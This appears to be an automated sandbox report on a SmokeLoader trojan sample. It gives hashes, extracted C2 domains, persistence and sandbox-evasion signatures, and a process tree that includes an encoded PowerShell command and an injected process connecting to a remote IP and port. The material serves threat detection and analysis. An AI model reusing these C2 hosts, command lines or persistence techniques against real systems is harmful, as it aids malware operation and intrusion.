Overview

overview

10

Static

static

dridex

windows10-2004_x64

10

Analysis

  • max time kernel
    157s
  • max time network
    163s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    28-01-2022 17:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d31f7a4a68a38581a88a343cbc9be8480acdba021c3bca39f6d45c4cac352be1.exe

  • Size

    352KB

  • MD5

    11d9e55a4cc32d18382d0428eb99a651

  • SHA1

    5d8d56e2743332e8184ac8c4724ee166387e1b54

  • SHA256

    d31f7a4a68a38581a88a343cbc9be8480acdba021c3bca39f6d45c4cac352be1

  • SHA512

    abc88024ca89676e8a6de77cd8eb6c4df17f34642b16163ccf814f86c72dbd5ecae6cd062fe180fb3e66227ec82b7ac52ae0fc8457c6c7cba66ee5e3ecc04684

Score
10/10
smokeloaderbackdoorpersistencetrojan

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://kotabuki.com/

http://slusextense.com/

http://purekidboo.com/

http://wildzipcode.biz/
rc4.i32
rc4.i32

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Installed Components in the registry 2 TTPs
    persistence
  • Sets service image path in registry 2 TTPs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 13 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Modifies registry class 55 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 51 IoCs
  • Suspicious use of SendNotifyMessage 21 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d31f7a4a68a38581a88a343cbc9be8480acdba021c3bca39f6d45c4cac352be1.exe
    "C:\Users\Admin\AppData\Local\Temp\d31f7a4a68a38581a88a343cbc9be8480acdba021c3bca39f6d45c4cac352be1.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:1580
  • C:\Windows\System32\WaaSMedicAgent.exe
    C:\Windows\System32\WaaSMedicAgent.exe 7adb5f04f2b9878ef33f84e7fba49bd7 zI7tg6i4XkS7qX4zTH8XcA.0.1.0.0.0
    1⤵
    • Modifies data under HKEY_USERS
    PID:2648
  • C:\Users\Admin\AppData\Local\Temp\670F.exe
    C:\Users\Admin\AppData\Local\Temp\670F.exe
    1⤵
    • Executes dropped EXE
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2112
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc WwBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AFMAbABlAGUAcAAoADIAMAAwADAAMAApAA==
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1884
    • C:\Users\Admin\AppData\Local\Temp\670F.exe
      C:\Users\Admin\AppData\Local\Temp\670F.exe
      2⤵
      • Modifies WinLogon for persistence
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:432
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        3⤵
        • Enumerates connected drives
        • Checks SCSI registry key(s)
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:1572
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 45.58.112.70 1338 ONuansynJ
        3⤵
          PID:3848
    • C:\Windows\SysWOW64\explorer.exe
      C:\Windows\SysWOW64\explorer.exe
      1⤵
        PID:3416
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 876
          2⤵
          • Program crash
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:2552
      • C:\Windows\explorer.exe
        C:\Windows\explorer.exe
        1⤵
          PID:2204
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3416 -ip 3416
          1⤵
          • Suspicious use of NtCreateProcessExOtherParentProcess
          • Suspicious use of WriteProcessMemory
          PID:2852
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
          1⤵
            PID:3676
          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
            1⤵
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            PID:756
          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
            1⤵
            • Enumerates system info in registry
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            PID:4072

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Initial Access

          Execution

          Persistence

          Winlogon Helper DLL

          1
          T1004

          Registry Run Keys / Startup Folder

          3
          T1060

          Privilege Escalation

          Defense Evasion

          Modify Registry

          4
          T1112

          Credential Access

          Discovery

          Query Registry

          5
          T1012

          System Information Discovery

          6
          T1082

          Peripheral Device Discovery

          2
          T1120

          Lateral Movement

          Collection

          Exfiltration

          Command and Control

          Impact

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\670F.exe.log
            MD5

            e309ab46728031325412385f1321672e

            SHA1

            a26e8b1f88b33b7732507133a42c041537f9e2b3

            SHA256

            1fd43786db1663d58e600089d0d286bc2c497dbeaa5072e3e3f862dea463fd78

            SHA512

            ff7c1d353636f022818b64f0bc53dc568dbc576e74d05a3bf2e453fe17d7cfe3a86ed6c152b4db233032560d0fab581e065d9c748c4d2c0257228e4c95f89040

            Download Submit
          • C:\Users\Admin\AppData\Local\Temp\670F.exe
            MD5

            33b9b818b9df0f62d3b1b60d9532460a

            SHA1

            7a39016360c77b27be774171e8191dd69bec77dc

            SHA256

            3eaa7fc7db197261c38f35461a3ac745ddc5fe88f0dddf8e277f69aac0ac449d

            SHA512

            151e974c6f41be2c69cc189ead4013a303eb31784e3659da2b9658250f52b3d37eda4c536e191d77544bb1c2f1e06825a4d6ddf96d22e361732d66dcf1038548

            Download Submit
          • C:\Users\Admin\AppData\Local\Temp\670F.exe
            MD5

            33b9b818b9df0f62d3b1b60d9532460a

            SHA1

            7a39016360c77b27be774171e8191dd69bec77dc

            SHA256

            3eaa7fc7db197261c38f35461a3ac745ddc5fe88f0dddf8e277f69aac0ac449d

            SHA512

            151e974c6f41be2c69cc189ead4013a303eb31784e3659da2b9658250f52b3d37eda4c536e191d77544bb1c2f1e06825a4d6ddf96d22e361732d66dcf1038548

            Download Submit
          • C:\Users\Admin\AppData\Local\Temp\670F.exe
            MD5

            33b9b818b9df0f62d3b1b60d9532460a

            SHA1

            7a39016360c77b27be774171e8191dd69bec77dc

            SHA256

            3eaa7fc7db197261c38f35461a3ac745ddc5fe88f0dddf8e277f69aac0ac449d

            SHA512

            151e974c6f41be2c69cc189ead4013a303eb31784e3659da2b9658250f52b3d37eda4c536e191d77544bb1c2f1e06825a4d6ddf96d22e361732d66dcf1038548

            Download Submit
          • memory/432-157-0x0000000005080000-0x000000000511C000-memory.dmp
            Filesize

            624KB

            Download
          • memory/432-156-0x0000000005630000-0x0000000005BD4000-memory.dmp
            Filesize

            5.6MB

            Download
          • memory/432-154-0x0000000000400000-0x000000000042A000-memory.dmp
            Filesize

            168KB

            Download
          • memory/1572-170-0x00000000023D0000-0x00000000023D1000-memory.dmp
            Filesize

            4KB

            Download
          • memory/1580-130-0x00000000004A0000-0x00000000004CB000-memory.dmp
            Filesize

            172KB

            Download
          • memory/1580-131-0x0000000000640000-0x0000000000649000-memory.dmp
            Filesize

            36KB

            Download
          • memory/1580-132-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

            Download
          • memory/1884-146-0x00000000073E0000-0x0000000007402000-memory.dmp
            Filesize

            136KB

            Download
          • memory/1884-144-0x00000000075C0000-0x0000000007BE8000-memory.dmp
            Filesize

            6.2MB

            Download
          • memory/1884-145-0x0000000004EB0000-0x0000000006F90000-memory.dmp
            Filesize

            32.9MB

            Download
          • memory/1884-143-0x0000000004EB0000-0x0000000006F90000-memory.dmp
            Filesize

            32.9MB

            Download
          • memory/1884-147-0x0000000007DE0000-0x0000000007E46000-memory.dmp
            Filesize

            408KB

            Download
          • memory/1884-148-0x0000000007F00000-0x0000000007F66000-memory.dmp
            Filesize

            408KB

            Download
          • memory/1884-149-0x00000000084A0000-0x00000000084BE000-memory.dmp
            Filesize

            120KB

            Download
          • memory/1884-150-0x0000000004EB0000-0x0000000006F90000-memory.dmp
            Filesize

            32.9MB

            Download
          • memory/1884-142-0x0000000006EF0000-0x0000000006F26000-memory.dmp
            Filesize

            216KB

            Download
          • memory/2112-153-0x00000000068C0000-0x0000000006952000-memory.dmp
            Filesize

            584KB

            Download
          • memory/2112-152-0x0000000006120000-0x0000000006121000-memory.dmp
            Filesize

            4KB

            Download
          • memory/2112-139-0x0000000000DC0000-0x0000000000DCE000-memory.dmp
            Filesize

            56KB

            Download
          • memory/2204-136-0x00000000008C0000-0x00000000008CC000-memory.dmp
            Filesize

            48KB

            Download
          • memory/2432-133-0x0000000000BA0000-0x0000000000BB6000-memory.dmp
            Filesize

            88KB

            Download
          • memory/3416-138-0x0000000002A60000-0x0000000002ACB000-memory.dmp
            Filesize

            428KB

            Download
          • memory/3416-137-0x0000000002AD0000-0x0000000002B44000-memory.dmp
            Filesize

            464KB

            Download
          • memory/3848-158-0x0000000000400000-0x0000000000416000-memory.dmp
            Filesize

            88KB

            Download
          • memory/3848-160-0x0000000005340000-0x00000000053D2000-memory.dmp
            Filesize

            584KB

            Download
          • memory/3848-163-0x0000000006610000-0x0000000006660000-memory.dmp
            Filesize

            320KB

            Download